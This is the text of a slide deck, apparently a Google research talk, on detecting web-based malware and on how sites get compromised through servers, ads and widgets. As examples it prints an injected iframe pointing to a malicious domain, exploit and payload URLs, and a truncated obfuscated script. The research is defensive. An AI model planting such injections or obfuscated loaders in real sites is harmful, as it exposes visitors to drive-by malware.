Post on 13-Jun-2020
The Ghost In The BrowserAnalysis of Web-based Malware
Niels ProvosDean McNamee
Panayiotis MavrommatisKe Wang
Nagendra Modadugu
Google Inc
Google IncThe Ghost In The Browser
Overview
• Introduction
• Detecting Malicious Pages
• Content Control
• Malware Trends
• Conclusion
2
Google IncThe Ghost In The Browser
Introduction
• Internet essential for everyday life: ecommerce, etc.
• Malware used to steal bank accounts or credit cards
• underground economy is very profitable
• Internet threats are changing:
• remote exploitation and firewalls are yesterday
• Browser is a complex computation environment
• Adversaries exploit browser to install malware
3
Google IncThe Ghost In The Browser
Introduction
• To compromise your browser, we need to compromise your web server
• Very easy to set up new site on the Internet
• Very difficult to keep new site secure
• insecure infrastructure: Php, MySql, Apache
• insecure web applications: phpBB2, Invision, etc.
4
Google IncThe Ghost In The Browser
Detecting Malicious Websites
• Malicious website automatically installs malware on visitor’s computer
• usually via exploits in the browser or other software on the client (without user consent)
• Using Google’s infrastructure to analyze several billion URLs.
5
Google IncThe Ghost In The Browser
Detecting Malicious Websites
6
Web PageRepository
MapReduceHeuristical URL Extraction
Virtual Machine
Internet Explorer
MonitorExecution Analysis
URL
Result
Malicious PageRepository
Google IncThe Ghost In The Browser
Processing Rate• The VM gets about 300,000 suspicious URLs daily
• About 10,000 to 30,000 are malicious
7
11-01 11-21 12-11 12-31 01-20 02-09 03-01 03-21Time
100
101
102
103
104
105
106
Num
ber o
f URL
s
MaliciousInconclusiveHarmless
Google IncThe Ghost In The Browser
Content Control
• what constitutes the content of a web page?
• authored content
• user-contributed content
• advertising
• third-party widgets
• ceding control to 3rd party could be a security risk
8
Google IncThe Ghost In The Browser
Web Server Security
• compromise web server and change content directly
• many vulnerabilities in web applications, apache itself, stolen passwords
• templating system
9
<!-- Copyright Information --><div align='center' class='copyright'>Powered by<a href="http://www.invisionboard.com">Invision Power Board</a>(U)v1.3.1 Final © 2003 <a href='http://www.invisionpower.com'>IPS, Inc.</a></div></div><iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe><iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>
Google IncThe Ghost In The Browser
Advertising• by definition means ceding control of content to
another party
• web masters have to trust advertisers
• sub-syndication allows delegation of advertising space
• trust is not transitive
10
Russia
USAPopular Web Site
advertisementAds
CompanyJavascript
Ads
Company
Javascript
Ads
CompanyJavascript
Ads
Company
Javascript
Exploit
Server
HTTP
Redirect
Google IncThe Ghost In The Browser
Third-Party Widgets
• to make sites prettier or more useful:
• calendaring or stats counter
• search for praying mantis
• linked to free stats counter in 2002 via Javascript
• Javascript started to compromise users in 2006
11
http://expl.info/cgi-bin/ie0606.cgi?homepagehttp://expl.info/demo.phphttp://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1http://expl.info/ms0311.jarhttp://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11http://dist.info/f94mslrfum67dh/winus.exe
Google IncThe Ghost In The Browser
Malware Trends and Statistics
• Avoiding detection
• obfuscating the exploit code itself
• distributing binaries across different domains
• continuously re-packing the binaries
12
document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o%20gr%E1tis%20para%20seu%20site%20renda%20extra%0D...3C/SCRIPT%3E%0D%0A%3C/HEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));//--></SCRIPT>
Google IncThe Ghost In The Browser
Malware Classifications
13
01-11
01-14
01-17
01-20
01-23
01-26
01-29
02-01
02-04
02-07
02-10
02-13
02-16
02-19
02-22
02-25
02-28
03-03
03-06
03-09
03-12
03-15
03-18
03-21
Date
1
10
100
1000
10000
100000
Uniq
ue U
RLs
disc
over
ed
AdwareUnknownTrojan
Google IncThe Ghost In The Browser
Remotely Linked Exploits• Exploits are leveraged across many sites
• Popular exploits are linked from over 10,000 URLS
14
0 20 40 60 80 100 120 140 160 180 2001
10
100
1000
10000
Num
ber o
f URL
s
0 20 40 60 80 100 120 140 160 180 2001
10
100
1000
10000
Num
ber o
f hos
ts
Google IncThe Ghost In The Browser
Discussion
• increase of web-based exploitation over time
• installed malware allows for remote control
• observed botnet like structures:
• pull-based: frequently checking for new commands
• observed user agents such as: DDoSBotLoader
• binary updates can be interpreted as command & control
15
Google IncThe Ghost In The Browser
Conclusion
• Web-based malware is a real problem
• millions of potentially infected users
• Automatic detection of malicious web pages to secure web search results
• Identified four areas of content control
• Observed botnet-like structures
16